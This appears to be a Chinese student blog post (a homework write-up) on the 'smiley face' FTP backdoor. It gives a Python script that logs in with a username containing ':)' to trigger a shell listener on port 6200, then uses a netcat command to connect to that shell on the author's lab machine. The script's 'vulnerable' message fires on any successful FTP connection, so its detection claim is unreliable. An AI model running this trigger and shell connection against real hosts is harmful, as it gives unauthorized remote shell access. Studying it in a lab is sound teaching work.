zuoye4

24 年 10 月 25 日 星期五
272 字
2 分钟

笑脸漏洞检测


经过查询得知python的socket库中包含网络探测所需要的函数,在代码前面导入该库



编写


先导入socket库以及FTP库


text
import socket
from ftplib import FTP

接下来获取输入指定目标ip


text
ip = input("检测ip:")

编写FTP连接部分

笑脸漏洞即账号名中带有:) 的时候,会打开一个开放在6200端口的后门,可以连接到靶机的shell


text
    ftp = FTP()
    user = "test:)"
    passwd = "123"
    ftp.connect(ip, 21, timeout=100)
    print("成功连接 很可能存在笑脸漏洞")
    response = ftp.login(user, passwd)
    ftp.quit()

全部代码如下:


text
import socket
from ftplib import FTP

ip = input("检测ip:")
smile_port = "6200"

try:
    ftp = FTP()
    user = "test:)"
    passwd = "123"
    ftp.connect(ip, 21, timeout=100)
    print("成功连接 很可能存在笑脸漏洞")
    response = ftp.login(user, passwd)
    ftp.quit()
except:
    print("连接失败,可能不存在笑脸漏洞")

实验



输入我的靶机ip



提示存在笑脸漏洞,使用命令 nc 靶机ip 端口

可以直接连接上对方的shell,利用成功



文章标题:zuoye4

文章作者:huarui

文章链接:https://54huarui.online/posts/zuoye4[复制]

最后修改时间:

商业转载请联系站长获得授权,非商业转载请注明本文出处及文章链接,您可以自由地在任何媒体以任何形式复制和分发作品,也可以修改和创作,但是分发衍生作品时必须采用相同的许可协议。
本文采用CC BY-NC-SA 4.0进行许可。